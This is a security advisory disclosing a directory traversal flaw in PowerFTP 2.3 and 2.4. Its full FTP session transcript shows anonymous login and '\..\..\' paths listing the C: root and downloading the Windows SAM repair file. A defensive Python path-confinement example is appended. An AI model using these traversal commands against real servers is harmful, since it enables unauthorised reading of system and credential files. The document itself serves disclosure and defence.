Directory Traversal vulnerability found in PowerFTP 2.24 from CooolSoft
Discovered by Dennis Rand
------------------------------------------------------------------------

-----[SUMMARY

PowerFTP is a powerful FTP client/server software. The best feature of PowerFTP is multi-threaded downloading and uploading: it can even split one big file into several parts and download each part at the same time. With PowerFTP, you will get the FASTEST transferring speed! Another good feature of this product is the Personal FTP server, which can make your computer act as a standard FTP server. You can add or remove accounts and edit share directory access permissions.

A vulnerability in the product allows remote attackers to cause the server to traverse into directories that reside outside the bounding FTP root directory, reading files, retrieving files and performing a DoS attack on the server.

-----[DETAILS

Vulnerable systems:
 * PowerFTP version 2.4
 * PowerFTP version 2.3
 * Previous versions are presumably vulnerable too.

Immune systems:
 * PowerFTP version 2.5

PowerFTP's failure to filter out the "\.." and "/.." sequences in some command requests allows remote users to break out of restricted directories and gain read access to the system directory structure, including the possibility of retrieving files from outside the restricted area.

The following transcript demonstrates a sample exploitation of the vulnerabilities:

C:\data\Private\Maximum\der\advisories>ftp
ftp> open To 192.168.1.199
Connected to 192.168.1.199.
220 Personal FTP Server ready
User (192.168.1.199:(none)): anonymous
331 Password required for anonymous.
Password:
230 User anonymous logged in.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
iissamples
scripts
wwwroot
226 File sent ok
ftp: 37 bytes received in 0,00Seconds 37000,00Kbytes/sec.
ftp> cd ..
250 CWD command successful. "C:/Inetpub/" is current directory.
ftp> cd ...
250 CWD command successful. "C:/Inetpub/" is current directory.
ftp> ls
200 Port command successful.
150 Opening data connection for directory list.
.
..
iissamples
scripts
wwwroot
226 File sent ok
ftp: 37 bytes received in 0,00Seconds 37000,00Kbytes/sec.
ftp> dir
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 .
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 ..
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 iissamples
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 scripts
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 wwwroot
226 File sent ok
ftp: 307 bytes received in 0,00Seconds 307000,00Kbytes/sec.
ftp> dir \..\..\
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:48 1308 FTP
-rwxrwxrwx   1 ftp      ftp             0 Dec 23  2002 AUTOEXEC.BAT
-r--r--r--   1 ftp      ftp           278 Jan 18 08:49 boot.ini
-rw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 CONFIG.SYS
dr--r--r--   1 ftp      ftp             0 Dec 23  2002 I386
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Inetpub
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Installationsfiler til Windows Update
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Multimedia Files
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 OptionPack
-rw-rw-rw-   1 ftp      ftp     524288000 Jan 18 18:17 pagefile.sys
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:48 Program Files
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:53 TEMP
-rw-rw-rw-   1 ftp      ftp             0 Jan 18 19:00 test.txt
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:36 WINNT
226 File sent ok
ftp: 938 bytes received in 0,02Seconds 46,90Kbytes/sec.
ftp> dir /../../
200 Port command successful.
150 Opening data connection for directory list.
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:48 1308 FTP
-rwxrwxrwx   1 ftp      ftp             0 Dec 23  2002 AUTOEXEC.BAT
-r--r--r--   1 ftp      ftp           278 Jan 18 08:49 boot.ini
-rw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 CONFIG.SYS
dr--r--r--   1 ftp      ftp             0 Dec 23  2002 I386
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Inetpub
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Installationsfiler til Windows Update
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 Multimedia Files
drw-rw-rw-   1 ftp      ftp             0 Dec 23  2002 OptionPack
-rw-rw-rw-   1 ftp      ftp     524288000 Jan 18 18:17 pagefile.sys
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:48 Program Files
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:53 TEMP
-rw-rw-rw-   1 ftp      ftp             0 Jan 18 19:00 test.txt
drw-rw-rw-   1 ftp      ftp             0 Jan 18 18:36 WINNT
226 File sent ok
ftp: 938 bytes received in 0,10Seconds 9,38Kbytes/sec.
ftp> get \..\..\winnt\repair\sam._
200 Port command successful.
150 Opening data connection for \..\..\winnt\repair\sam._.
226 File sent ok
ftp: 3196 bytes received in 0,26Seconds 12,25Kbytes/sec.
ftp> get /../../Winnt/repair/sam._
200 Port command successful.
150 Opening data connection for /../../Winnt/repair/sam._.
226 File sent ok
ftp: 3196 bytes received in 0,01Seconds 319,60Kbytes/sec.
ftp> bye
221 Goodbye.

Note that in the transcript the CWD command is confined to "C:/Inetpub/", while the same ".." sequences given to dir (LIST) and get (RETR) are passed through unfiltered, so the filtering is applied per command rather than to every path the server receives.

-----[DETECTION

PowerFTP versions 2.3 and 2.4 are vulnerable to the above-described attacks. Earlier versions may be susceptible as well. To determine if a specific implementation is vulnerable, follow the above transcript.

-----[VENDOR RESPONSE

PowerFTP version 2.5 fixes this issue. The latest version is available from http://www.cooolsoft.com/powerftp.htm

-----[ADDITIONAL INFORMATION

The vulnerability was discovered by Dennis Rand

-----[DISCLAIMER

The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
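The root cause described under DETAILS is a per-command filter for "\.." and "/.." that misses LIST and RETR. The following is an added example (not PowerFTP's code) of the defensive alternative: one resolver that normalises both separators, resolves the virtual path lexically, and is applied to every path-taking verb. The root "C:/Inetpub", the verb set and the reply texts are assumptions modelled on the transcript.

```python
"""Uniform FTP path confinement (added example, not PowerFTP's code)."""


class TraversalError(ValueError):
    """Raised when a requested path would leave the FTP root."""


# Every verb whose argument names a path goes through the same resolver.
PATH_VERBS = {"CWD", "LIST", "NLST", "RETR", "STOR", "DELE", "MKD", "RMD"}


def resolve_ftp_path(root, cwd, requested):
    """Map a client path to (virtual_path, filesystem_path) or raise.

    root      filesystem root of the FTP tree, e.g. "C:/Inetpub" (assumed)
    cwd       client's current directory in the virtual tree, e.g. "/wwwroot"
    requested raw CWD/LIST/RETR argument; "/" and "\\" are both accepted
    """
    # Normalise separators first: filtering only "/.." lets "\.." through.
    path = requested.replace("\\", "/")
    if not path.startswith("/"):
        path = cwd.rstrip("/") + "/" + path
    parts = []
    for seg in path.split("/"):
        if seg in ("", "."):
            continue
        if seg == "..":
            if not parts:
                # Climbing above "/" is rejected, not silently clamped,
                # so the attempt can be logged by the caller.
                raise TraversalError(requested)
            parts.pop()
        elif set(seg) == {"."}:
            # "..." and longer dot runs are not ordinary names; Win32 path
            # normalisation may collapse them, so refuse them outright.
            raise TraversalError(requested)
        else:
            parts.append(seg)
    virtual = "/" + "/".join(parts)
    return virtual, root.rstrip("/") + virtual


def handle(root, cwd, verb, arg):
    """Return (reply_line, new_cwd) for one command; no per-verb special cases."""
    verb = verb.upper()
    if verb not in PATH_VERBS:
        return "502 Command not implemented", cwd
    try:
        virtual, fs = resolve_ftp_path(root, cwd, arg)
    except TraversalError:
        return "550 Permission denied", cwd
    if verb == "CWD":
        return f'250 CWD command successful. "{fs}" is current directory.', virtual
    return f"150 Opening data connection for {fs}", cwd
```

On a real server a final `os.path.realpath` comparison against the root is still advisable after this lexical check, since the operating system applies its own normalisation to the resulting path.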